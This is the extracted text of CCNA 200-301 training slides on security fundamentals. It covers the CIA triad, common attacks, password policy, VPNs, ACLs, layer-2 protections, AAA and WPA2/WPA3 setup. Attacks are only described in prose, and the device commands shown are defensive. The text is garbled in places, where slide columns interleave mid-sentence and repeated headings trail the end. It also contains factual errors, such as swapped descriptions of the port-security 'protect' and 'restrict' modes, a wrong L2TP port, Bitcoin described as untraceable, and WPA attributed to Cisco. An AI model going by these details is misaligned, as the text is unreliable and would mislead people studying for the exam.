CCNA Enterprise 200 301 Modul5

Module 5: Security Fundamentals
• Lesson 1: Define key security concepts • Lesson 6: Configure and verify access control lists
• Lesson 2: Describe security program elements • Lesson 7: Configure Layer 2 security features
• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,

local passwords authorization, and accounting concepts
• Lesson 4: Describe security password policies • Lesson 9: Describe wireless security protocols
elements
• Lesson 10: Configure WLAN using WPA2 PSK using
• Lesson 5: Describe remote access and site-to- the GUI
site VPNs
Lesson 1: Define key security concepts
• Threats
• Vulnerabilities
• Exploits
• Mitigation techniques
Confidentiality, Integrity, Availability (CIA)
• Confidentiality – allowing access to only those who
have been permitted and denying access to those
who have not been permitted
• Physical locks, safes, firewalls can be used for confidentiality
• Encrypt-in-storage – encrypted data which only those with
the encryption key can get access
• Encrypt-in-transit – as data travels across the network, it is
encrypted
• Integrity – How accurate the information is and what
potential it has to being altered
• Access control lists (ACLs) can prevent unauthorized access
• Authentication Headers (AH) can protect data in transit
• Hashing – data is run through an algorithm to generate a hash
value, and is stored. When the file is read again, the hashing
algorighm is run again and the two values are compared, if
they are the same, the file has not been altered
• Availability – the ‘uptime’ of the devices that hold the
data
• Build in redundancy such as RAID, clustering, FHRP, and do
backups to boost availability
• Threats • Exploits
• Potential danger to a company resource • A method that acts on a vulnerability
• Internal – coming from an employee inside the • Usually a script or software is used for the
company – share private information and or exploit
compromise internal systems
• Can check CVE to find patch or method to
• External – coming from outside the company and block exploit
dependent on the companies connection to the
outside world (Internet) • Least privilege
• Threat actor – person causing the threat (hacker) • Restrict the level of access for a user to the
lowest level that still allows them to do their
• Vulnerabilities job
• Security weaknesses • Can mitigate internal threats as this minimized
• Physical – no keycard needed to get into protected the overall access users have
areas
• Network based – security weakness within • Role-based access
applications, operating systems and networking • An upgrade from the need to detail access
devices rights of each file
• Patching mitigates vulnerabilities • Users are given a role or multiple roles which
• Common Vulnerabilities and Exposures (CVE) should give them specific and appropriate
rights to resources
• Provides listing of publicly known
vulnerabilities and exposures • Role could be user/admin
• Zero-day – a vulnerability that does not yet have a User Role Rights Resource
parch or workaround
Common Vulnerabilities Malicious Software
• Unnecessary running services – disable all • Virus – Attached to a file, when the file is opened, virus
unnecessary services running on a system. Any is activated and infects the system
service running can be a vulnerability
• Worm virus – modern common form of virus. Self-
• Open ports – TCP or UDP ports that are open replicating, and can infect without opening a file. Can
on a system can be exploited. Close ports, use come though software vulnerabilities and can spread to
firewall to block access to ports that need to other systems.
be open
• Trojan virus – Program you open because you think it is
• Unpatched systems – Keep systems up to date valid. Will open a TCP port for external hacker to exploit
with latest patches and security fixes. Older the system
patches can be vulnerable.
• Spyware – hidden software monitors and collects
• Unencrypted sessions – encrypt information such as Internet surfing habits
communication sessions between systems as
much as possible • Adware – Automatically loads advertisements on
screen as pop-up windows
• Clear-text credentials – Use authentication
protocols that encrypt passwords • Ransomware – takes control of system and does not
give control back until a fee is paid
• Unsecure protocols – Protocols such as HTTP,
TFTP, SNMPv2 send traffic unencrypted. Use • Spam – unsolicited commercial emails
the secure form of these protocols such as • Logic Bomb – planted on system with intention of
HTTPS, SNMPv3 infecting it later. Waits for a certain condition to exist
Mitigating Attacks
• Patch systems – Have patch management process
in place. Up do date patches remove vulnerabilities.
• Encrypt network traffic – In order to guard your
companies communication, encrypt network traffic
in all possible areas.
• Encrypt data stored on mobile devices - In the
event of losing a laptop, tablet, or smart phone,
mobile devices should be encrypted to prevent
someone accessing sensitive data from the device.
• Install antivirus software – In addition to running
AV software, keep it up to date.
• Use strong passwords – all user accounts and
devices should use strong passwords
• Educate employees – Employees need to be aware
of the risks they take in not following proper
security practices
• Run hashing algorithms – Verify integrity of data by
running it through a hashing algorithm and
compare its hash value with the original hash value
Attack Types
Social Engineering Attacks
People want to be helpful when they feel someone is in need and
this trait can be exploited
• Gathering information from employees without them
knowing about it
• Phishing
• Attacker sends an email that looks legit but is hoping for PII
– personally identifiable information
• Spear phishing – targeted to a specific victim or group of victims
• Tailgating
• When someone badges into a door and goes through the attacker
will go in after them before the door closes
• Piggybacking
• Just like tailgating but the person opening the door will never see the
attacker. Attacker waits (hides) until they can catch the door before
closing
• Shoulder Surfing
• Watching someone type in sensitive information such
as username/password or credit card number
• Privacy screen can be installed to mitigate this as well as being
aware of your environment when entering sensitive information
Network based Attacks
• The attack utilizes technology such as network
and operating system to cause harm to the
targeted company or companies
• DoS
• Denial of service – attack used to disrupt a service a
company uses via the Internet.
• Sends massive amounts of false requests to a
resource so that when a valid request is sent, it
cannot get through
• Types of DoS attacks:
• Reflective
• Attacker sends a request to a 3rd party server and forge the
source address of the packet with the companies IP address
• 3rd party responds back to the victim!
• Two victims, the 3rd party that got used, and the attacked
• Amplified
party
• Similar to reflective
• Makes a small request to 3rd party that creates a large
response to the victim
• DNS request that contains many aliases
• Distributed (DDoS)
• Most common
• Creates many ‘bots’ called a ‘botnet’ so that not just one
bad source can be blocked to stop the attack
• Uses command and control server to control the bots
• On-Path Attack (Man in the middle)
• Attacker positions itself between the host and the server
with the host being unaware
• Able to ‘watch’ and even modify traffic between host and
server. Can also impersonate either side
• DNS Poisoning
• Attacker replaces legit DNS entries with a
compromised servers IP address
• Random answers to DNS server with bad actors IP address and
hope for the DNS server to a legit DNS server for the answer
and when it gets the bad actors reply, the targeted DNS server
accepts the answer
• Not as effective today as improvements have been made as
well as DNSSEC (DNS Security Extensions) prevents spoofing
• VLAN Hopping
• Attacker switches the VLAN they are currently assigned to to
gain access to a system on another VLAN. Two ways to do this:
• Switch spoofing – uses lazy switchport config – if the switchport is not
changed from a trunk, the attacker can spoof the trunking protocol to
negotiate the trunk link and then tag their packets with a
different VLAN that is also on the trunk
• Double-tagging of VLANs – one-way attack – attacker tags the packet
with the VLAN they are in as well as well as double tagging the packet
with the intended VLAN. Switch received the tagged frame, removed
first VLAN tag and forwards the frame. Next switch will see the intended VLAN.
Victim gets the packet but return trip will not happen.
You can DOS with this
• ARP Spoofing
• Address resolution protocol (ARP) resolves an IP address to a MAC
address
• Attacker sends a spoofed ARP reply to a broadcast that would be
sent when the device does not know the interface for a
destination MAC address
• Used as a combination with an on-path attack. Attacker gets the
default gateway IP address first. Attacker waits for the ARP request
for the default gateway and reply with a forged GARP (gratuitous
ARP). GARP is used to notify hosts when a MAC address changes and
the IP to MAC mapping needs to be updated. Victim receives the
packet and updates their ARP entry for the attacker gateway IP
address. Attacker can then accept packets that were intended for
default gateway, read the contents, and pass the info on to the real
default gateway
• Rogue DHCP
• Attacker deploys DHCP server that hands out bad IP addresses
which can cause DoS because a client with a bad IP wont be able to
use the network
• Can also be used to redirect traffic through an attackers machine
by change the default gateway which is provided by a DHCP
option.
• Attacker can now watch traffic and capture login info and
other sensitive data as it goes through their machine
• Rogue Access Point
• AP that provides unwarranted wifi access separate from the
corporate wifi. Gives attacker ability to be on the network from
outside the building, without needing to be wire connected.
• Port security at the switchport will mitigate this threat
• Evil Twin
• Wifi phishing attack
• Attacker sets up an AP to look just like the
organizations wifi.
• Makes the signal stronger to make it look more attractive
• Ransomware
• Locks and encrypts a device until a ransom fee is paid
• Usually happens when a phishing email link is clicked
• Bitcoin is requested as it is untraceable currency
• Recommendation is to not pay the ransom as it keeps this
type of attack alive.
• Password Attacks
• Attacker is guessing common passwords for
common usernames such as admin, administrator, root,
etc
• Use passwords that are 10 characters long, not a
common word, and upper, lower, number, special
character!
• Uses a database of common words
• Dictionary Attacks
• Also has variants such as passsw0rd
• Brute-force Attacks – tries every combination
• MAC Spoofing
• Used to bypass firewalls that use MAC authentication bypass
(MAB) which is used in networks that allow self registration
sometime for BYOD environments
• User registers their device with its MAC address and the
firewall sees that MAC and allows it to bypass security and it
gets a VLAN assignment
• Attacker learns the MAC address of the user, assigns it to
their own device and they have access!
• IP Spoofing
• Attacker impersonates an IP address that is already assigned
to a device
• Can be used in DoS attacks to conceal the attackers actual IP
address
• Deauthentication
• Wireless uses a deauthenticaion frame when a client drops off
the network
• Attacker sends deauthentication frame on behalf of the
user which disconnects them from the access point.
• Used in conjunction with evil twin so that once the user is
deauthenticated they will try to rejoin to the malicious AP
• Malware
• Software with malicious intent (not specific)
• Virus is a specific type of malware with purpose to multiply,
infect and do harm
• Malware covers other forms such as ransomware which is the
biggest threat today

elements
site VPNs
Lesson 2: Describe security program elements
• User awareness
• Training
• Physical access control
• User awareness
• Not sharing passwords
• Use strong passwords
• Keep doors shut and locked
• Keep desk clean
• Don’t click links from untrusted
sources
Prevention methods
• Employee Training
• Preventative and proactive measure to increases employee education
• Boosts security awareness
• Access Control Hardware
• Badges
• Identification badges – provide proof of access to others
• Proper process and procedure must be in place for the enforcement of badges
• Biometrics
• Fingerprints, retina scans, voice recognition, facial recognition
• Locking Racks
• Racks that networking equipment is kept in should be locked to
prevent unauthorized access and inadvertent powering down of
devices
• Locking Cabinets
• Filing cabinets have sensitive company information and should
be locked
• Access Control Vestibule (known as mantrap)
• Small room with two doors that are controlled
• Once entered door 1, cannot enter door 2 until access is granted
• Prevents tailgating, and piggybacking
• Smart Lockers
• Amazon deliveries!
• Electronically controlled lockers that hold your package and give you
access after you scan a delivery code
Detection methods
Lets you know what happened, when it happened and who
did it
• Camera
• Fixed – best for surveillance purposes
• Pan-tilt-zoom (PTZ) – can give 360 degree view and
used for intervention but can miss the incident as
it
occurs
• Video surveillance
• Coaxial cable
• Used in environments where coax has already been ran or
where long runs that ethernet cannot support are needed
• Called Closed circuit television (CCTV)
• Storage is usually directly attached (DAS)
• Ethernet
• IP surveillance – becoming the standard
• Camera can be placed anywhere an Ethernet cable can be run
and can also take advantage of Power over Ethernet (POE)
• Network video recorder (NVR) is the system and uses
Network attached storage (NAS) or storage area network
(SAN) for
storage
• Can do License plate recognition (LPR)
• Media converter – can be used to convert coax cameras to
Ethernet
Detection methods
• Motion Detection
• Passive Infrared (PIR) most common due to price
• Monitors the amount of infrared radiation from several zones
• Microwave detectors are more expensive and used
where wide coverage is needed
• Vibration sensors mostly used for seismic purposes
• Asset Tracking Tags
• Track, secure, locate, identify organization assets
• Two types:
• Passive RFID – need a powered transponder to activate
the tag with RF signals. Tag will respond to receiver
with the unique ID
• Active RFID – battery powered transmitter and can use
wifi, Bluetooth and RFID
• Wifi version can be tracked by the wireless controller
• Tamper Detection
• Indicates a system is compromised in some way
• Nonelectrical – security strip that displays a mark when
peeled off
• Electrical – uses a micro switch on the case cover
• If case is removed a SNMP alert is triggered
• Think of an alarm system placed on a door to a room which
contains network equipment. Unauthorized person enters and
alarm sounds

elements
site VPNs
Lesson 3: Configure device access control using local passwords
• Configure device access

control using local passwords
Username and Password Options
• No username or password
• Least secure
• Cisco requires a password for remote access
• Static username and password
• Manually set on each network device
• Does not expire
• Username and password with expiration
• Like static but configured to expire at a certain point
and would need to be changed before that point
• One-time password (OTP)
• Very secure
• Based on a ‘secret passphrase’ which is a list that
generates passwords
• Token cards
• Most secure
• Users get a token card and PIN
Username and Password Configuration
• Passwords are set in five places on cisco devices
• Console, Auxiliary, telnet (VTY), enable password,
and enable secret
• Enable password and enable secret secure
privileged mode
• Character-mode access
• Most common and called line authentication
• Uses different passwords depending on the line the
user is connecting through
• Enable passwords
• Enable password – sets enable password for older
IOS systems (pre 10.3)
• Enable secret – encrypted password and will
override the enable password
• User-mode passwords
• Set in lines
• Line console – sets console user-mode password
• Line Vty – sets telnet password on device
• Line aux – sets password for aux which is used for
modem connection
• Exec-timeout 0 0 – sets the timeout to 0 so it never
times out
• Logging synchronous – when messages pop up, you
are set to device prompt without you input being
interrupted. Very helpful!
• Telnet password
• line vty 0 15 - Takes you to the vty lines
• Password password - Specifies the telnet password
• Login - Specifies the ability to login
• Ability to login from other IOS device, PC command
line, or application such as Putty
• telnet IP address of device
• Encrypting passwords
• When doing a show run your passwords can
be seen, except the secret which is encrypted
by
default
• Service password-encryption manually encrypts the
passwords

elements
site VPNs
Lesson 4: Describe security password policies elements
• Management
• Complexity
• Password alternatives
• Multifactor authentication
• Certificates
• Biometrics
Password Management
Setting strong passwords
• Should be as long as possible
• Minimum of 10 characters
• Calculations can be made to determine how
quickly a password can be comprimised
• The longer and more complex the password, the
longer it will take an attacker to compromise it
Password expiration
• The longer a password is used, the more likely it
will be compromised
• Require users to reset passwords every 30 days
• Prevent the use of previously used passwords
Password Management
Password Complexity What NOT to use
• Align your level of password complexity The word password
requirements to the technical capabilities of the Proper names
workforce
Pets name
• Password policies can be set at domain level
using Group Policy objects Childrens names
Any word in the dictionary
• Find the balance of users being able to manage
their own password and security level License plate number
• Use lowercase, uppercase, numbers and special Street name
characters Birthdates
• A longer, simpler will be better than a shorter Company name
complex one
Screensaver Required Password
• Screensaver should come on after a given
amount of time and a password should be
required to exit the screensaver
Password Management
Password Management Features
• Automatic account lockouts
• Can be set to lock the account after a certain amount of
unsuccessful attempts
• Stops attackers scripts from brute forcing an account
• Admin should manually unlock (don’t have a system do it)
• Password expiration and password histories
• Even good passwords don’t do well over time
• Set passwords to expire after a certain amount of time (30 –
45 days)
• Ensure password history can hold enough passwords so
users cannot re-use them
Single Sign-On
• Today, there are many systems that users need to
sign in to
• Users can get frustrated by having to remember
passwords for all these systems and my resort to
unsafe security practices for convenience
• Single Sign-On (SSO) solves this issue by utilizing an
access token that is generated when the user signs
on to the domain
• Access token has a list of all resources (folders,
databases, websites, etc) that the user is authorized
to login
• Anytime the user logs into one of the resources, the
token is verified and allowing the user to access the
resource without having to type in credentials
Local Authentication
• When the user logs in they will authenticate to the
local user database with their local account
• Local database is called Security Accounts Manager
(SAM) for Windows
• In Linux, it is stored in a text file /etc/passwd and is
known as the password file
LDAP
• Lightweight Directory Access Protocol (LDAP) is based LDAP common attributes
on an earlier X.500 standard, and is simpler but but
includes more attributes Common Name (CN)
Domain Component (DC)
• Hierarchy of users, groups, systems, servers, client
workstations, etc Organizational Unit (OU)
• Directory can be used my many applications because it
has data about users and other network entities
• Microsoft Active Directory utilizes LDAP
Password Alternatives
Certificates X.509 certificate fields
• Digital certificate provides a user with credentials to Version
prove its identity and associates that identity with a Serial Number
public key
Algorithm ID
• Need to provide serial number, issuer, subject (owner),
Issuer
and public key
Validity
• Text document that ties a user account to a public and
private key pair created by a certificate server or Subject
certificate authority (CA) Subject Public Key Info
• Verisign has digital certificate classes: Public Key Algorithm
• Class 1: intended for email Subject Public Key
• Class 2: provide proof of identity
Issuer Unique Identifier (optional)
• Class 3: servers and software signing in which independent
verification and identity and authority checking is done by the Subject Unique Identifier (optional)
issuing CA
Extensions (optional
Password Alternatives
Multifactor Authentication
• Adds an additional level of security to the
authentication process by verifying more than one
characteristic
• Users can be identified in the following ways:
• By something they know (password)
• By something they are (retina, fingerprint)
• By something they possess (smart card)
• By somewhere they are (location)
• By something they do (behavior)
• Two-factor authentication happens when two of the
above items are tested
Biometrics
• Use physical characteristics to identify the users
• Systems include hand scanners, retinal scanners, etc

elements
site VPNs
Lesson 5: Describe remote access and site-to-site VPNs
• Describe remote access and

site-to-site VPNs
Remote Access Overview
• Use case is for when you are
not physically next to the
servers
• Remote workers, remote
offices
• Virtual Private Network (VPN)
allows a worker or remote
office to establish a secure
connection over an Internet
(untrusted) connection
VPN Protocols
• Point-to-Point Tunneling Protocol (PPTP) –
encrypts Point-to-Point (PPP) traffic. Uses Generic
Routing Encapsulation (GRE) to transport and
Microsoft Point-to-Point Encryption (MPPE) to
encrypt. Uses TCP port 1723 (control) and protocol
ID 47 (data). Older protocol
• Layer 2 Tunneling Protocol (L2TP) – Newer than
PPTP. Uses IPSec (Internet Protocol Security) for
encryption. Uses UDP port 500 (key exchange),
UDP port 5500 (IPSec NAT), UDP port 1701.
• Secure Socket Transport Protocol (SSTP) –
Commonly used today. Uses Secure Socket Layer
(SSL) to encrypt traffic. Uses SSL port 443.
Additional Security Protocols
• Generic Routing Encapsulation (GRE)– designed to
create a point-to-point tunnel between two
devices. Establishes the link and then encapsulates
other types of traffic such as IPv4 packets into the
GRE packet. Commonly used to setup VPN tunnel
between routers.
• IPSec (Internet Protocol Security) – encrypts all IP
traffic once it has been configured on the device.
Uses Encapsulation Security Payload (ESP) to
encrypt traffic, Authentication Header (AH) for
message integrity and authentication and Internet
Key Exchange (IKE) to exchange encryption keys
• Internet Security Association and Key
Management Protocol (ISAKMP) – sets up a secure
channel (security association) and exchanges keys.
Used by IKE for authentication before key
exchange.
Remote Access VPNs
• Install VPN software on laptop to connect over the
Internet to a VPN server at the main site.
• Provides security of company data while going over
the Internet
• One of the protocols mentioned (PPTP, L2TP, SSTP)
will be used to encrypt data from laptop over the
Internet and to the main site.
• A user could use Cisco AnyConnect software and
establish a VPN connection using SSL.
Site-to-Site VPNs
• VPN appliance, such as a router, is installed at each
location that that is used to create an encrypted
tunnel to each other.
• Users do not have to install software on their
laptops, their traffic will over over their network
normally until it hits the router, and then it will be
encrypted and transferred to the other side of the
VPN
• Commonly used to connect branch offices to the
main office.

elements
site VPNs
Lesson 6: Configure and verify access control lists
• Configure and verify access

control lists
Access Lists
• Access Control Lists (ACL) provides control of
network traffic
• Used to filter out unwanted traffic based on
security policies
• Can be setup to only allow certain hosts or
networks access to a certain resource
• ACLs are packet filters that packets are compared
against, categorized by and acted upon accordingly
• Can be applied for inbound or outbound traffic on
an interface
• The packet is always compared with each line of
the ACL in sequential order starting with line 1
• The packet is compared with lines of the ACL only
until a match is made, and then action is taken
• ”Implicit deny” at end of each ACL. If packet
doesn’t match any lines, the packet is dropped.
Standard Access Lists
• Only use source IP address and an IP packet as the
condition test. All decisions are made based on
source IP address.
Extended Access Lists
• Much more detailed
• Evaluate source and destination IP addresses,
protocol at network layer header, port at transport
layer header
Named Access Lists
• Can be standard or extended
• Uses words for the ACL instead of a number
Applying Access Lists
• Once the ACL lines are written, it needs to be referenced on an
interface. Such as a layer 3 interface on a router.
• This will be the point where the traffic is compared against the
ACL lines
• Only one ACL per interface per protocol per direction
• If a new entry is added to an ACL it will be placed at the bottom
of the list
• Cannot remove just one line from a list. If a line needs removed,
copy entire ACL to text editor, remove the line, and then re-
apply the entire ACL
• ACLs are designed to filter traffic that goes through the router,
not traffic that is generated on the router
Inbound Access Lists
• ACL is applied to inbound packets on an interface, those packets
are processed before getting routed to the outbound interface
Outbound Access Lists
• ACL is applied to outbound packets on an interface, those
packets get routed to outbound interface, processed before
being queued
Standard Access Lists
• Filters traffic based on source IP address in a packet
• Standard ACL can use the following numbers:
• 1 – 99
• 1300 – 1999
• The router knows what type of ACL is being created based on

the number that is used
• Access-list number deny|permit address|any|host
Wildcard Masks
• Used to specify a network, range or specific host in ACLs
• To specify a host: 10.0.0.52 0.0.0.0
• Whenever you have a 0 in the wildcard, the number must match
exactly
• To specify a /8 network: 10.0.0.0 0.255.255.255
• To specify a /24 network: 10.0.0.0 0.0.0.255
• Whenever you have a 255 in the wildcard, it can be any number
• If you need to match a subnet with a wildcard mask, just invert
the subnet mask. Subtract each octet in the subnet mask from
255 which will result in the wildcard mask.
Wildcard Mask Examples
IP Address Wildcard Mask Matches
0.0.0.0 255.255.255.255 Match on any address
(same as keyword ‘any’)
172.16.1.1 0.0.0.0 Match only if the address
is 172.16.1.1
172.16.1.0 0.0.0.255 Match only on packets that
are in 172.16.1.0 –
172.16.1.255
are in 172.16.2.0 –
172.16.3.255
are in 172.16.0.0 –
172.16.255.255
Standard Access List Example
• We want to deny the 10.0.0.0 network from
accessing the 10.1.0.0 network, but want
anything else to be able to access that network
• By applying to s0/3/0 any outbound traffic with
source IP in the 10.0.0.0 network will be
dropped
• However the 10.0.0.0 network can still get to other
areas.
Controlling VTY Access
• Standard ACLs can be use on VTY lines to limit
telnet and SSH access
• Don’t have to specify protocol since VTY already
defaults to telnet and ssh protocols
• Create a standard ACL that permits only the
hosts you want to be able to access the
router
• Apply the ACL to the VTY line using ‘access-
class’ command and use the ‘in’ direction as
this applies to inbound traffic
• Only hosts in the 10.0.0.0/24 network will be
able to telnet/ssh into the router. All others will
be denied
Extended Access Control Lists
• Standard ACL expanded
• Can specify source and destination
addresses
• Can specify protocol and port number
• Extended ACL numbers:
• 100 – 199
• 2000 - 2699
• Overall more granular approach to ACLs
• With an extended ACL number you can see all
the additional options
• This will deny FTP from any IP to the 10.1.0.51
IP, any other traffic would be permitted
• In order to permit other traffic you also need
the following line:
• Access-list 123 permit ip any any
• This is due to the implicit deny which is on every ACL
• You can add the keyword ‘log’ at the end of

an ACL which will log a message every time
the ACL is hit
Named Access Control Lists
• Can be used for standard or extended ACLs
• Use names instead of numbers for ACL lines
• Have to start with ‘ip access-list’ instead of
‘access-list’
Remarks
• Provides ability to add comments to the ACL
• A good remark can be very valuable and save
hours of troubleshooting time for someone
who is just seeing the ACL for the first time
• Try to remember to place them as the first
line of the ACL
Monitoring Access Control Lists
• Show access-list – displays all access lists and
their parameters configured on the router. Also
shows statistics
• Show access-list 123 – shows only the
parameters for the specific ACL.
• Show ip access-list – shows ACLs configured
on the router
• Show ip interface – displays which interfaces
have ACLs set on them
• Show running-config – shows the ACLs and the
specific interfaces that have ACLs applied on
them

elements
site VPNs
Lesson 7: Configure layer 2 security features
• DHCP snooping
• Dynamic ARP inspection
• Port security
Layer 2 Security Overview
The access layer is where we generally
find layer 2 networking. This is also where
end user devices connect to the network.
Putting security mechanisms is critical in
protecting users, applications and the
network from attacks.
Disable unused ports
• Shut down any switchports that are not
currently used. This prevents an
unauthorized person from connecting
to an active switchport
• Use the shutdown command on the
interface
Port security
• Ability to lock down switchports based
on MAC address or addresses
associated with the interface.
• Prevents unauthorized access to the
LAN
• Only works on ports in access mode –
does not work on trunked ports
Port security configuration
• Switchport mode access
• Ensures your switchport is in access mode
• Switchport port-security
• Enables port security on the interface
• Switchport port-security maximum number
• Max number of devices that can be associated with
the interface
• Switchport port-security violation
• Protect – sends alert if unauthorized devices connects
• Restrict – sends frames for authorized device only.
Drops other frames
• Shutdown – port disables once an unauthorized device
connects
• Switchport port-security mac-address aaaa.aaaa.aaaa
• Specifies the mac-address of the device that is
authorized to connect to the switchport
• Can use the keyword sticky instead of the mac-address
which will set the authorized mac-address as the one that is
currently associated with the switchport
DHCP Snooping configuration
Prevents rogue DHCP servers from handing out bad IP
addresses. Can also give out bad DNS server and default
gateway IPs. Give attacker ability to have all traffic flow
through their gateway (man-in-the-middle).
Sets switchport to be trusted or untrusted, where the
valid DHCP server switchport will be trusted.
• Ip dhcp snooping
• Ip dhcp snooping vlan 1
• Enables DHCP snooping. Run these two commands
LAST as trust has not been setup yet
• Interface f0/24
• Ip dhcp snooping trust
• Sets the port to be authorized to process DHCP traffic
(you would connect your DHCP server to this port)
• Show ip dhcp snooping binding
• Shows untrusted hosts that have received IPs from the
DHCP server
Dynamic ARP Inspection
Address Resolution Protocol (ARP) is used to learn the MAC
addresses that are associated with IP addresses. A broadcast
ARP is looking for a MAC address of a specific IP address. Only
the device with that IP address should respond with its MAC
address. The asking device then stores that IP and MAC in its
ARP cache.
Attackers are able to manipulate the ARP cache to their
advantage (called ARP poisoning). An attacker can use their
own MAC address and correspond it to the IP address of the
default gateway (called man-in-the-middle). This would
send the users traffic through the attackers system.
Cisco switches have the Dynamic ARP Inspection (DAI)
option on their switches.
• Intercepts all ARP messages and compares the information
with the DHCP snooping binding database.
• If the information does not match the packet is dropped.

elements
site VPNs
Lesson 8: Differentiate authentication, authorization, and
accounting concepts
• Authentication
• Authorization
• Accounting
accounting concepts
AAA Services
Authentication
• Validates the credentials of the user as
they attempt to sign in
• Utilizes a database with info such as usernames
and passwords
accounting concepts
Authentication methods
• Local authentication
• Creating specific accounts on a system for access
• No centralized system
• Can be used as a backup if centralized authentication is
not working
• 802.1x
• Supplicant – Authenticator – Authentication Server
• Controls access on the internal network and can be
used for wired and wireless connections
• Usually uses RADIUS as authentication server but can
also use LDAP and TACACS+
• Extensible authentication protocol (EAP)
• Framework for transmitting credentials for the user or
device accounts securely
• Not a specific protocol but a framework
• Cisco uses LEAP (lightweight) for wireless
• Microsoft uses PEAP (protected) for users
accounting concepts
AAA Services
Authorization
• Once verified, user has access to the network resource.
• Based on account and privileges, authorization determines
how much access is granted
• In order to control traffic, ACLs can be used.
• Rules configured on Cisco routers that either permit or deny certain
types of traffic
• Network Access Control – provides the ability to authorize

who can gain access to wired/wireless networks based on
the state of the connecting devices which is known as a
posture assessment.
• Connect to wireless – accept terms before access is given
• Patching levels – AV installed and up to date, patch levels are current
• Switch connection – if using 802.1x, can ensure the device is
authenticated so a system such as RADIUS before access is given
• Port security – control of switchports based on MAC address

accounting concepts
AAA Services
Accounting
• Logging activity when users access a resource.
• Used for auditing purposes
• Examples could include:
• File access – log each time a user accesses certain
files on a server (or deletes a file)
• Database access – log when a user accesses
certain data in a database or changes fields
accounting concepts
AAA Services
• TACACS+
• Terminal Access Controller Access Control System +
• Developed by Cisco and is now an open standard
• Used for network routers and switches for
authentication, authorization, accounting (AAA)
• Getting transitioned to RADIUS
• RADIUS
• Remote dial-in user service, also known as the ‘AAA
server’
• Used for remote access and wireless today
• Works like client-server – server controls AAA,
client would be a wireless AP or VPN or 802.1x
switches
• A user logs on and gets authenticated, they try to
access a resource and get authorized, and that
access is accounted for (logged)

elements
site VPNs
Lesson 9: Describe wireless security protocols
• WPA
• WPA2
• WPA3
WiFi Protected Access (WPA)
• Cisco answer to WEP (which just used a pre-shared key and not secure) • Personal
• Encryption - Dynamic key exchange using Temporal Key Integrity Protocol • WPA2/3 using a pre-shared key (PSK)
(TKIP)
• Enterprise
• 802.1x user authentication with EAP or pre-shared keys
• WPA2/3 using an authentication server
WPA2 for authentication
• CCMP block cipher mode – Counter mode with cipher block chaining
message authentication code protocol
• AES for encryption
• Message Integrity Check (MIC) with CBC-MAC
• Very secure but it is possible to be brute-forced
• Highly supported on common devices
WPA3
• GCMP Block Cipher Mode
• Galois Counter Mode Protocol
• Stronger encryption than WPA2
• AES for encryption
• MIC with Galios Message Authentication Code (GMAC)
• PSK Mutual Authentication (Client and AP)
• Simultaneous Authentication of Equals (SAE)
• Diffee-Hellman key exchange with authentication
Feature WPA WPA2 WPA3

Authenticate with pre-shared keys Yes Yes Yes
Authenticate with 802.1x Yes Yes Yes
Encryption and MIC with TKIP Yes No No
Encryption and MIC with AES and CCMP No Yes No
Encryption and MIC with AES and GCMP No No Yes
802.1x and EAP
• With open encryption, wireless clients are
authenticated locally at the AP.
• Should only be used where security is of no
concern
• EAP messages are encapsulated inside 802.1x
packets for network access authentication
with wired or wireless authentication
• 802.1x – client uses open authentication to
associate with an AP and then client
authentication process happens with a
dedicated authentication server.
• Supplicant – client device that is requesting
access
• Authenticator – network device that provides
access to the network. For wireless it can be the
wireless control server (WCS)
• Authentication server – device that permits or
denies access based on a user database and
policies (usually a RADIUS server)

elements
• Lesson 10: Configure WLAN using WPA2 PSK
• Lesson 5: Describe remote access and site-to- using the GUI
site VPNs
Lesson 10: Configure WLAN using WPA2 PSK using the GUI
• Configure WLAN using WPA2

PSK using the GUI
Module 2: Network Access
Lesson 9: Configure the components of a wireless LAN access for
client connectivity using GUI
• WLAN creation
• Create Dynamic Interface
• Controller -> Interfaces -> New
• Enter Interface Name
• Enter VLAN ID
• Enter IP address within the
range of the network
• WLAN creation
• Create WLAN
• WLANs -> Create New
• Enter profile name
• Enter SSID
• Click Apply
• Security settings
• Security -> WPA+WPA2 on
Layer 2 tab
• Select WPA2 Policy, AES and
PSK
• Select ASCII and fill in PSK
• QoS profiles
• Helps to dictate how traffic
is prioritized:
• Platinum - voice
• Gold - video
• Silver – regular traffic
• Bronze – background traffic
• Advanced WLAN settings

• Specify session timeout
value
• URL filtering
• Maximum number of
clients
• And more!
Thank You !!!

CCNA Enterprise 200 301 Modul5

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CCNA Enterprise 200 301 Modul5

Uploaded by

Copyright:

Available Formats

Module 5: Security Fundamentals

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,

• Configure device access

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,

• Describe remote access and

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,

• Configure and verify access

• The router knows what type of ACL is being created based on

• You can add the keyword ‘log’ at the end of

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,

• Network Access Control – provides the ability to authorize

• Port security – control of switchports based on MAC address

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,

Feature WPA WPA2 WPA3

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,

• Configure WLAN using WPA2

• Advanced WLAN settings

You might also like